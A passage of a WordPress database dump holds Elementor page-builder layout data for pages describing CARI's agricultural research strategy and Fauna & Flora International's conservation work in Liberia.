":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e7ea003\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e523af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f62a49d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"889098f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b849575\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"624b486\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f62a49d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d684caf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8ac02e7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9246,1617,'_elementor_controls_usage','a:0:{}'),(9247,1617,'_elementor_edit_mode','builder'),(9248,1617,'_elementor_template_type','wp-post'),(9249,1617,'_elementor_version','2.7.5'),(9250,1617,'_wp_page_template','default'),(9251,1617,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e7ea003\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e523af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f62a49d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"889098f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b849575\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"624b486\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f62a49d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"d684caf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8ac02e7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9253,1618,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9254,1618,'_elementor_edit_mode','builder'),(9255,1618,'_elementor_template_type','wp-post'),(9256,1618,'_elementor_version','2.7.5'),(9257,1618,'_wp_page_template','default'),(9258,1618,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e7ea003\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e523af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f62a49d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"889098f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b849575\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"624b486\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f62a49d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"d684caf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8ac02e7\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9259,1614,'_edit_lock','1629235618:42'),(9260,1612,'_edit_lock','1629236428:42'),(9261,1610,'_edit_lock','1629238882:42'),(9262,1619,'_elementor_controls_usage','a:0:{}'),(9263,1619,'_elementor_edit_mode','builder'),(9264,1619,'_elementor_template_type','wp-post'),(9265,1619,'_elementor_version','2.7.5'),(9266,1619,'_wp_page_template','default'),(9267,1619,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"FFI Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"37ef818\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1c00780\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"10a4e07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e03e301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b08a954\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9caf5f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 